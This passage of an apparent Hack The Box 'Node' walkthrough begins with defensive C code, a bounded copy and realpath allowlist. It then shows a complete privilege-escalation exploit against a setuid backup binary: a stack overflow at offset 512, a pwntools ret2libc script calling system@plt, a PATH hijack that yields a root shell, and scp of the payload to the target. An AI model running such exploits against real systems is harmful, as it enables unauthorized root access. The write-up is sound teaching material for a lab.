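static size_t bounded_len(const char *s, size_t max) {
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Bounded replacement for displayTarget: the name is copied into the fixed
 * local buffer only when it fits, and the status line is written into msg
 * instead of printed.  Returns 0 on success and -1 when the argument is too
 * long for the buffer, which is the case that corrupts the stack in the binary. */
int display_target_safe(const char *target, char *msg, size_t msglen) {
    char local[TARGET_MAX];
    if (target == NULL || msg == NULL || msglen == 0)
        return -1;
    size_t n = bounded_len(target, sizeof local);
    if (n >= sizeof local)                 /* no room left for the terminating NUL */
        return -1;
    memcpy(local, target, n);
    local[n] = '\0';
    snprintf(msg, msglen, " [+] Starting archiving %s", local);
    return 0;
}

/* Allowlist on the canonical path instead of a denylist of substrings: the
 * target must exist and its realpath() must lie inside realpath(base).  The
 * kernel resolves "..", "//" and symlinks before the comparison, so nothing
 * depends on string matching.  Returns 1 if allowed, 0 otherwise. */
int target_allowed(const char *base, const char *target) {
    char cbase[PATH_MAX], ctarget[PATH_MAX];
    if (base == NULL || target == NULL)
        return 0;
    if (bounded_len(target, TARGET_MAX) >= TARGET_MAX)
        return 0;                          /* rejected before anything copies it */
    if (realpath(base, cbase) == NULL || realpath(target, ctarget) == NULL)
        return 0;                          /* nonexistent paths are rejected, not archived */
    size_t blen = strlen(cbase);
    if (strncmp(ctarget, cbase, blen) != 0)
        return 0;
    /* "/tmp" must not accept "/tmpfoo": the prefix has to be followed by a
     * separator or the end of the string (base "/" is already a separator). */
    return blen == 1 || ctarget[blen] == '\0' || ctarget[blen] == '/';
}

/* Constructed inputs: the 1000 x 'D' name from the writeup and a normal one.
 * Returns 1 when both checks behave as intended, 0 otherwise. */
int self_check(void) {
    char big[1001], msg[TARGET_MAX + 32];
    memset(big, 'D', 1000);
    big[1000] = '\0';
    if (display_target_safe(big, msg, sizeof msg) != -1)
        return 0;                          /* over-long name must be refused */
    if (display_target_safe("nofolder", msg, sizeof msg) != 0)
        return 0;
    if (strcmp(msg, " [+] Starting archiving nofolder") != 0)
        return 0;
    if (target_allowed("/tmp", big) != 0)
        return 0;                          /* same length bound applies here */
    return 1;
}

int main(int argc, char **argv) {
    const char *base = argc > 1 ? argv[1] : "/tmp";   /* assumed backup root */
    printf("self_check: %d\n", self_check());                                   /* 1 */
    printf("%s under %s: %d\n", base, base, target_allowed(base, base));        /* 1 */
    printf("/tmp/../etc under %s: %d\n", base, target_allowed(base, "/tmp/../etc")); /* 0 */
    return 0;
}
```

Because the check is "is the resolved path under the allowed root" rather than "does the string contain something bad", there is no list of forbidden substrings to keep up to date.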

Privilege escalation

Buffer overflow

If the folder name is a thousand Ds, we get a buffer overflow.

u505@kali:~/HTB/Machines/Node$ ./backupnode -a 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python -c "print 'D'*1000"`



[ASCII-art banner: Secure Backup v1.0]

[+] Validated access token
[+] Starting archiving
Segmentation fault
u505@kali:~/HTB/Machines/Node$ sudo tail -n 2 /var/log/syslog
May 20 17:50:29 kali kernel: [101469.038428] backupnode[8790]: segfault at 44444444 ip 0000000044444444 sp 00000000fff77c70 error 14 in libc-2.30.so[f7d3c000+1d000]
May 20 17:50:29 kali kernel: [101469.038434] Code: Bad RIP value.

The EIP register has the value 44444444, which corresponds to DDDD.

Offset determination

The pattern generated by PEDA's built-in pattern creator contains characters that the program does not allow.

gdb-peda$ pattern create 1000
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'

The Metasploit pattern generator uses none of the prohibited characters.

u505@kali:~/HTB/Machines/Node$ /usr/bin/msf-pattern_create -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
u505@kali:~/HTB/Machines/Node$ gdb backupnode
GNU gdb (Debian 9.1-3) 9.1
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from backupnode...
(No debugging symbols found in backupnode)
(gdb) init-peda
gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B



[+] Validated access token
[+] Starting archiving Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x40b
EBX: 0xffec7ce0 --> 0x4
ECX: 0x0
EDX: 0x804938b --> 0x712d00 ()
ESI: 0xf7f7e000 --> 0x1dfd6c
EDI: 0xffec7c2f --> 0x796500 ()
EBP: 0x72413971 ('q9Ar')
ESP: 0xffec6c00 ("Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax"...)
EIP: 0x31724130 ('0Ar1')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x31724130
[------------------------------------stack-------------------------------------]
0000| 0xffec6c00 ("Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax"...)
0004| 0xffec6c04 ("r3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9"...)
0008| 0xffec6c08 ("4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0A"...)
0012| 0xffec6c0c ("Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay"...)
0016| 0xffec6c10 ("r7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3"...)
0020| 0xffec6c14 ("8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4A"...)
0024| 0xffec6c18 ("As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay"...)
0028| 0xffec6c1c ("s1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7"...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x31724130 in ?? ()
gdb-peda$ quit
u505@kali:~/HTB/Machines/Node$ /usr/bin/msf-pattern_offset -q 0x31724130
[*] Exact match at offset 512

As expected, the offset is 512 (the local variable is 508 bytes long).
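The offset lookup above, reproduced as an added example in C (it is neither the writeup's code nor Metasploit's own): it regenerates the Aa0Aa1... cyclic pattern and searches it for the little-endian bytes of the faulting EIP, which is why 0x31724130 ("0Ar1") maps to offset 512 and the 'q9Ar' in EBP to offset 508.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example: the cyclic pattern used by msf-pattern_create. Each
 * triple is one uppercase, one lowercase and one digit, cycling the digit
 * fastest, so any 4-byte window is unique within the first 20280 bytes. */

/* Write the first len bytes of the pattern into buf (buf holds len+1). */
size_t pattern_create(char *buf, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                char triple[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++)
                    buf[n++] = triple[i];
            }
    buf[n] = '\0';
    return n;
}

/* Offset of the 4 bytes that landed in a 32-bit register, or -1 if the
 * value is not part of the pattern. x86 is little-endian, so the register
 * value 0x31724130 is the byte sequence 0x30 0x41 0x72 0x31 = "0Ar1". */
long pattern_offset(uint32_t value, size_t len)
{
    char pat[4096];
    unsigned char needle[4];
    if (len > sizeof pat - 1)
        len = sizeof pat - 1;
    len = pattern_create(pat, len);
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(value >> (8 * i));  /* LSB first */
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

int main(void)
{
    char pat[1001];
    pattern_create(pat, 1000);
    printf("%s\n", pat);
    printf("EIP 0x31724130 -> offset %ld\n", pattern_offset(0x31724130, 1000));
    printf("EBP 0x72413971 -> offset %ld\n", pattern_offset(0x72413971, 1000));
    return 0;
}
```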

EIP control

We build the skeleton of our exploit, which controls the value of EIP.

u505@kali:~/HTB/Machines/Node$ cat exploit_deadc0de.py
#!/usr/bin/python
from pwn import *
junk = 'D'*512
eip=0xdeadc0de
after = 'U'*8
payload = junk + p32(eip) + after
print payload
#file = open("payload","w")
#file.write (payload)
#file.close()

And run it in gdb:

gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_deadc0de.py`
Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_deadc0de.py`




[+] Validated access token
[+] Starting archiving▒▒▒UUUUUUUU
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x22f
EBX: 0xff881f90 --> 0x4
ECX: 0x0
EDX: 0x804938b --> 0x712d00 ()
ESI: 0xf7f70000 --> 0x1dfd6c
EDI: 0xff881edf --> 0x796500 ()
EBP: 0x44444444 ('DDDD')
ESP: 0xff880eb0 ("UUUUUUUU")
EIP: 0xdeadc0de
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0xdeadc0de
[------------------------------------stack-------------------------------------]
0000| 0xff880eb0 ("UUUUUUUU")
0004| 0xff880eb4 ("UUUU")
0008| 0xff880eb8 --> 0x8499500 --> 0x0
0012| 0xff880ebc --> 0x8048a1b (<main+30>: sub esp,0xc)
0016| 0xff880ec0 --> 0x0
0020| 0xff880ec4 --> 0x0
0024| 0xff880ec8 --> 0x0
0028| 0xff880ecc --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xdeadc0de in ?? ()

As expected, the buffer overflow occurs with the instruction pointer (EIP) set to 0xdeadc0de, and the top of the stack contains our 8 U characters.

Exploitation strategy

The executable imports several library functions through the PLT, so each of them is reachable at a fixed address inside the program.

gdb-peda$ elfsymbol
Found 24 symbols
strstr@plt = 0x80485e0
strcmp@plt = 0x80485f0
strcspn@plt = 0x8048610
fgets@plt = 0x8048620
fclose@plt = 0x8048630
time@plt = 0x8048640
geteuid@plt = 0x8048650
strcat@plt = 0x8048660
strcpy@plt = 0x8048670
getpid@plt = 0x8048680
puts@plt = 0x8048690
system@plt = 0x80486a0
clock@plt = 0x80486b0
exit@plt = 0x80486c0
srand@plt = 0x80486d0
strchr@plt = 0x80486e0
__libc_start_main@plt = 0x80486f0
fopen@plt = 0x8048700
strncpy@plt = 0x8048710
access@plt = 0x8048730
setuid@plt = 0x8048740
sprintf@plt = 0x8048750
remove@plt = 0x8048760
__gmon_start__@plt = 0x8048770

There are calls to system and exit from the program, so we can use them directly. We also need a string that can be used as a command.

Node16.png

The string "Validated access token" is a good candidate for the command to call: its last word, token, can serve as a command name if it is stored with a null terminator right after it.

gdb-peda$ find token
Searching for 'token' in: None ranges
Found 6 results, display max 6 items:
backupnode : 0x8049875 ("token")
      libc : 0xf7f1dd34 ("token.type)")
ld-2.30.so : 0xf7fc5986 ("token")
ld-2.30.so : 0xf7fc5d5f ("token substitution\n")
ld-2.30.so : 0xf7fc5d89 ("token substitution")
   [stack] : 0xff880ac9 ("token")
gdb-peda$ x/s 0x8049875
0x8049875:      "token"
gdb-peda$  x/6x 0x8049875
0x8049875:      0x74    0x6f    0x6b    0x65    0x6e    0x00
gdb-peda$ x/6d 0x8049875
0x8049875:      116     111     107     101     110     0

The address 0x8049875 contains the word token, followed by a null character.

u505@kali:~/HTB/Machines/Node$ cat exploit_token.py
#!/usr/bin/python
from pwn import *
junk = 'D'*512
eip=0xdeadc0de
systemadd=0x80486a0
exitaddr=0x80486c0
tokenaddr=0x8049875

payload = junk + p32(systemadd) + p32(exitaddr) + p32(tokenaddr)
print payload
#file = open("payload","w")
#file.write (payload)
#file.close()

First try in gdb.

gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_token.py`
Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_token.py`




[+] Validated access token
[+] Starting archiving▒u▒
[Attaching after process 9162 vfork to child process 9165]
[New inferior 2 (process 9165)]
[Detaching vfork parent process 9162 after child exec]
[Inferior 1 (process 9162) detached]
process 9165 is executing new program: /usr/bin/dash
sh: 1: token: not found
[Inferior 2 (process 9165) exited with code 0177]
Warning: not running

As expected, a new shell is spawned and tries to execute the command token, which is obviously not found.

Final test

First we give our local copy of the backup program the same owner and permissions as the program on the target (root-owned and setuid).

u505@kali:~/HTB/Machines/Node$ sudo chown root backupnode
u505@kali:~/HTB/Machines/Node$ sudo chmod 4755 backupnode
u505@kali:~/HTB/Machines/Node$ ls -l backupnode
-rwsr-xr-x 1 root u505 16484 May 15 20:25 backupnode

We create a file named token.

u505@kali:~/HTB/Machines/Node$ echo whoami > token
u505@kali:~/HTB/Machines/Node$ chmod +x token
u505@kali:~/HTB/Machines/Node$ token
-bash: token: command not found

The command is not found because its directory is not in the PATH.

u505@kali:~/HTB/Machines/Node$ echo $PATH
/home/u505/.local/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
u505@kali:~/HTB/Machines/Node$ export PATH=`pwd`:$PATH
u505@kali:~/HTB/Machines/Node$ echo $PATH
/home/u505/HTB/Machines/Node:/home/u505/.local/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
u505@kali:~/HTB/Machines/Node$ token
u505

Now that our command "token" works, we modify the exploit script to write the payload to a file.

u505@kali:~/HTB/Machines/Node$ echo /bin/bash > token
u505@kali:~/HTB/Machines/Node$ cat exploit_token.py
#!/usr/bin/python
from pwn import *
junk = 'D'*512
eip=0xdeadc0de
systemadd=0x80486a0
exitaddr=0x80486c0
tokenaddr=0x8049875

payload = junk + p32(systemadd) + p32(exitaddr) + p32(tokenaddr)
#print payload
file = open("payload","w")
file.write (payload)
file.close()
u505@kali:~/HTB/Machines/Node$ python exploit_token.py
u505@kali:~/HTB/Machines/Node$ ls -l payload
-rw-r--r-- 1 u505 u505 524 May 20 21:50 payload

We execute our exploit.

u505@kali:~/HTB/Machines/Node$ ./backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `cat payload`




[+] Validated access token
[+] Starting archiving▒u▒
kali:~/HTB/Machines/Node# id
uid=0(root) gid=1000(u505) groups=1000(u505),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),120(scanner)
kali:~/HTB/Machines/Node# exit
exit

Exploitation on target

We copy our payload to the target:

u505@kali:~/HTB/Machines/Node$ scp payload mark@node.htb:/tmp/
mark@node.htb's password:
payload                                        100%  524    13.0KB/s   00:00

From the target:

tom@node:/tmp$ ls -l payload
ls -l payload
-rw-r--r-- 1 mark mark 524 May 16 04:01 payload
